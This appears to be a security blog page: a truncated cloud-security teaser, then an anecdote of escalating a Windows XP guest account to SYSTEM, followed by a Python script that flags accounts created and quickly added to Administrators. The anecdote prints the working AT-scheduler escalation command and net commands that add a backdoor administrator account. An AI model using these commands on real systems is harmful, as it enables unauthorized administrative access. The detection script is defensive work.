Security Testing for entities hosted in cloud

Applications that are being migrated to the cloud, or are planned to be hosted in the cloud, need additional security considerations. Failure to ensure proper security protection when using cloud services may result in higher costs and loss to the business. Organizations must consider security controls for the different services, viz. Infrastructure as a Service (IaaS), Software as a Service (SaaS) or Platform as a Service.

Which applications should be moved to cloud?
·         Low to Medium Risk

What are the key security risks while hosting in cloud?
·         Isolation Failure – Multi-tenancy is a key thing in cloud. Failure in controls that separate the storage, memory, identity and access control, and routing between tenants is a huge risk.
·         Authentication and Authorization
·...

OK! If you say Windows XP is so Damn Vulnerable… I give you guest access on an XP system – Can you Hack this and get Admin Privileges?

Guest to Admin (NT Authority) on Windows XP.
It was during December 2013 when I was on my yearly holiday break and I visited my friend’s place. I visited my friend at his office – he is the ISO (Information Security Officer) for his company, an SMB.

He invited me to a discussion where 2 security consultants from a vendor were to visit them to consult on migrating to Windows 7 from XP. The consultant started by mentioning that Windows XP is very insecure and easily hackable, that even kids can hack it, and that it will soon be out of support. Then he continued telling them about Windows 7.

I mean, all of us know that it is obvious that Win XP is soon going to be out of support and Win 7 is a much more secure system. I was getting bored. But my friend all of a sudden posed a question to the security consultants: “I do not believe in the stories that are going around. I give you a Windows XP system and Guest access – can you prove this is hackable?”



That caught my attention and I suddenly respected him more. He was trying to test the capability of the consultants and if they can walk the talk.
The 2 security consultants were taken aback momentarily. One of them gathered himself back quickly and said yes there are many ways in which we can do it. But we have not got our tools with us.

My friend quickly offered to provide the required tools, and the vendor responded by saying, “This will be a POC and that is chargeable, sir.”
My friend asked him to come back with a quote for the same. I was feeling bad about this situation, wondering why we cannot walk the talk. Although I do not understand the financials of businesses very well, if I were him I wouldn’t mind doing a small free demo on the spot to prove my point.

Since I was an ex-employee of the company where my friend is ISO, he managed to convince his colleagues to let me do the demo.
So I was given an XP box and a guest account at 13:25.
I logged in as a guest, fired up a command prompt and typed the following command:

AT 13:30 /interactive "C:\windows\system32\cmd.exe"
and hit enter.

So at 13:30 the System command prompt started as “nt authority”
And I had the highest privileges on the system !!!
What followed next in the quick demo was to add another user to the system and add this user to the Administrators group.
net user /add G0tD4un1k Passw00rD!
User created successfully.
net localgroup administrators G0tD4un1k /add
User added to administrators group successfully.
Game over.
I handed the laptop back and asked them to log in as the new user….
This was an easy task for me. However, this made me realize that we often fail to walk the talk.

Note2Self: Make sure we know how we prove a system is vulnerable if we report it as vulnerable.

Although it sounds very obvious, it has been observed many times that folks report a vulnerability straight from the vulnerability scanner, and what follows is sometimes an embarrassing discussion. We should be extra careful while reporting vulnerabilities from a VA scanner. We should always validate the findings manually and then gauge the probability of that vulnerability being exploited before we report it as Critical.
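
The account creation and the Administrators-group addition in the demo above each leave an account-management audit event when that auditing is enabled. The following is an added example, not code from the original post: a Python check that correlates the two events. The record layout, field names, timestamps, the accounts other than G0tD4un1k and the 10-minute window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Account-management event IDs: XP/2003 value first, Vista-and-later value second.
ACCOUNT_CREATED = {624, 4720}
LOCAL_GROUP_MEMBER_ADDED = {636, 4732}
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per environment

# Constructed sample records, already normalized (member SID resolved to a name).
# The field names are hypothetical and do not match any real export format.
SAMPLE_EVENTS = [
    {"time": "2013-12-20 13:31:05", "id": 624, "actor": "NT AUTHORITY\\SYSTEM",
     "target": "G0tD4un1k", "group": None},
    {"time": "2013-12-20 13:31:40", "id": 636, "actor": "NT AUTHORITY\\SYSTEM",
     "target": "G0tD4un1k", "group": "Administrators"},
    {"time": "2013-12-20 09:00:00", "id": 624, "actor": "CORP\\helpdesk",
     "target": "jsmith", "group": None},
    {"time": "2013-12-20 16:45:00", "id": 636, "actor": "CORP\\helpdesk",
     "target": "jsmith", "group": "Administrators"},
    {"time": "2013-12-20 10:00:00", "id": 636, "actor": "CORP\\helpdesk",
     "target": "backupsvc", "group": "Backup Operators"},
]

def find_rapid_admin_grants(events, window=WINDOW):
    """Flag accounts that were created and then added to Administrators within `window`."""
    created = {}  # lower-cased account name -> creation time
    alerts = []
    # ISO-style timestamps sort correctly as plain strings.
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.strptime(ev["time"], "%Y-%m-%d %H:%M:%S")
        name = ev["target"].lower()
        if ev["id"] in ACCOUNT_CREATED:
            created[name] = when
        elif (ev["id"] in LOCAL_GROUP_MEMBER_ADDED
              and (ev["group"] or "").lower() == "administrators"
              and name in created
              and when - created[name] <= window):
            alerts.append({
                "account": ev["target"],
                "actor": ev["actor"],
                "seconds_after_creation": int((when - created[name]).total_seconds()),
                # Account changes made by SYSTEM itself are unusual on a workstation.
                "by_system": ev["actor"].upper().endswith("\\SYSTEM"),
            })
    return alerts

if __name__ == "__main__":
    for alert in find_rapid_admin_grants(SAMPLE_EVENTS):
        print(alert)
```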
